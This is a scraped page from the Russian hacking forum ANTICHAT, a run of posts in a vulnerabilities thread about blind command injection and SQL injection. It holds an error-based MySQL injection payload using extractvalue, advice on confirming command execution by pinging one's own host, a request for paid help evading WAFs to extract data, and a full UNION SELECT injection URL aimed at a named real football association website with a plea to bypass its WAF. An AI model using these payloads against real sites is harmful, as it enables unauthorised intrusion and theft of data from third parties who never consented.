HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2701  
Старый 12.10.2019, 18:25
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

Цитата:
Сообщение от Baskin-Robbins  
Baskin-Robbins said:

Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера.
Стандартом ведь ни на винде, ни на линуксах пинги не логируются, или я ошибаюсь?

Цитата:
Сообщение от BabaDook  
BabaDook said:

Тогда можешь выполнять системные команды. и сразу получить шелл. даже заливать ничего не надо
так у него и так сразу системная шелл вылазит

Цитата:
Сообщение от noppathee  
noppathee said:


 
Ответить с цитированием

  #2702  
Старый 13.10.2019, 01:42
Baskin-Robbins
Guest
Сообщений: n/a
Провел на форуме:
92829

Репутация: 212
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

нам не надо получать вывод команд.
Визуализируя всё это дело человеку проще будет, сложно учиться когда не видишь и не особо понимаешь что происходит

Цитата:
Сообщение от BabaDook  
BabaDook said:

Есть возможность получить шелл, и кстати вывод команд тоже можно получить
По линку есть материал на эту тему

Цитата:
Сообщение от fandor9  
fandor9 said:

Стандартом ведь ни на винде, ни на линуксах пинги не логируются, или я ошибаюсь?
Хорошо что заметил, еще бы линк добавить

/threads/434712/

Тут впринципе весь ответ сводится к ссылке на одну тему из которой становится ясно что делать дальше
 
Ответить с цитированием

  #2703  
Старый 13.10.2019, 01:50
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Baskin-Robbins  
Baskin-Robbins said:

Визуализируя всё это дело человеку проще будет, сложно учиться когда не видишь и не особо понимаешь что происходит
/threads/434712/
Согласен. самое простое конечно пинг на свой хост. Дальше от этого уже плясать.
 
Ответить с цитированием

  #2704  
Старый 13.10.2019, 14:06
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

Цитата:
Сообщение от Baskin-Robbins  
Baskin-Robbins said:

По линку есть материал на эту тему
Хорошо что заметил, еще бы линк добавить
/threads/434712/
Тут впринципе весь ответ сводится к ссылке на одну тему из которой становится ясно что делать дальше
В принципе на линуксе всё достаточно просто

Код:
Code:
iptables -I INPUT -p icmp --icmp-type 8 -m state  --state NEW,ESTABLISHED,RELATED -j LOG --log-level=1 --log-prefix "Ping Request "
и затем в консоли включаем

Код:
Code:
dmesg --follow
и там уже видим идёт ли пинг и от какого адреса (SRC=). Но опять-тако зависит от того, как настроена система, может быть что пинги до этого сбрасывает раутер.

На винде это немного сложнее, нужно сначала сконфигурировать брандмауэр винды и потом уже смотреть логи брандмауэра.
 
Ответить с цитированием

  #2705  
Старый 28.10.2019, 11:12
to the moon
Guest
Сообщений: n/a
Провел на форуме:
2479

Репутация: 3
По умолчанию

Попалась ситуация при раскрутке SQL иньекта, из которой не могу выбраться, буду признателен, если кто что подскажет.

Имеем вот такой MySql запрос:

Код:
Code:
SELECT test_value from table
where testmemo LIKE \'%'.$_POST['SQL'].'%\'
ORDER BY LOCATE(\''.$_POST['SQL'].'\',index);
Фильтруются символы # и * (без разницы, сырые, или в urlencode).

Комментарий -- 1 не срабатывает, хотя и не фильтруется. Кавычка ` в качестве комментария тоже не работает (про нулл байт вообще молчу).

Вставить например error-based вектор, а всё остальное закомментировать не получается, следовательно остается корректно достроить существующий запрос, но вот тут и начинаются проблемы.

Наш иньект попадает в запрос сразу в двух местах, в одном месте он обрамлен одинарными кавычками, а во втором случае ещё и взят в скобки.

И как в данной ситуации выкрутиться я не могу сообразить.
 
Ответить с цитированием

  #2706  
Старый 28.10.2019, 11:25
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от to the moon  
to the moon said:

Вставить например error-based вектор, а всё остальное закомментировать не получается
Код:
Code:
' AND extractvalue(1,concat(0x3a,(select @@version)))-'
 
Ответить с цитированием

  #2707  
Старый 28.10.2019, 14:07
2dd
Guest
Сообщений: n/a
Провел на форуме:
1798

Репутация: 0
По умолчанию

Уже не в первый раз встречаюсь с ситуацией, когда раскрутив MySQL иньект, при попытке взаимодействия с существующей таблицей, SQL иньект пропадает, и при этом если указать несуществующую таблицу, то всё ок.

Т.е. при запросе select count(*) from not_exists_table (который следует как подзапрос в error или union based векторах), если таблицы нет, то будет стандартная ошибка Table 'not_exists_table' doesn't exist

Если же указать реально существующую, то как будто SQL фильтруется. И так на очень многих сайтах. Сайты разные, и друг с другом никак не взаимосвязаны.

Если кто знает, как решить эту беду, подскажите.
 
Ответить с цитированием

  #2708  
Старый 28.10.2019, 14:27
Estet
Guest
Сообщений: n/a
Провел на форуме:
12641

Репутация: 0
По умолчанию

Напишу сюда.

ребята, кто шарит в sql inj, возможно кто-то желает оказывать персональную помощь, по различным вопросам в джабер за оплату?

Вопросы в основном по WAF и извлечению данных. (допустим почему выдает 500 ошибку или 400, к примеру)

Как заливать шелы, получать права и прочее такое не нужно.

Я мало в этом шарю, пользуюсь sqlmap и burp (automated scan), поэтому объяснять нужно как чайнику доступным языком.

Именно поэтому готов платить за помощь.

Так же сотрудничество на перспективу, я щедрый, с теми кто со мной честен и добр)))))

У меня не совсем тривиальная ситуация, объясню в джабере.

Пишите : 7jon7doe@cluster.sx

Много вашего времени не займу, в день может пара тройка вопросов!

Чуть дополню, мне скорее подойдет человек, который шарит в коде и чуть в скуле. На какие то вопросы ты мне ответишь, в каких-то вместе будем разбираться. Я это к тому, что врятли опытному хакеру нужна будет мелочь))
 
Ответить с цитированием

  #2709  
Старый 30.10.2019, 06:52
BenderMR
Guest
Сообщений: n/a
Провел на форуме:
22457

Репутация: 10
По умолчанию

помогите раздекодить строку. Проверяю и API и вся инфа с формы отправляется в таком виде

Код:
Code:
5d000008007200000000000000003d8888865474ae3953ed45d37f263bd75edbffa14070ca8100680ed91a004e8f482ba622d6df8a57cf5800cbf802a3eaa2e536c0c7f9c0c3d50668e4f56367357f70f75394537e88edff509845cb5dba03414af6cefedcc2c0c0fe453ca5ff57f3b216a833480a6dc4
Похоже на hex, но когда пробую декодить выдает какие то непонятные символы. Сайт китайский, может дело в этом. И как в таком случае с этим работать, потому что ни берпом, ни онлайн не вышло
 
Ответить с цитированием

  #2710  
Старый 02.11.2019, 18:03
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Помогите ваф обойти

Код:
Code:
https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,34,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ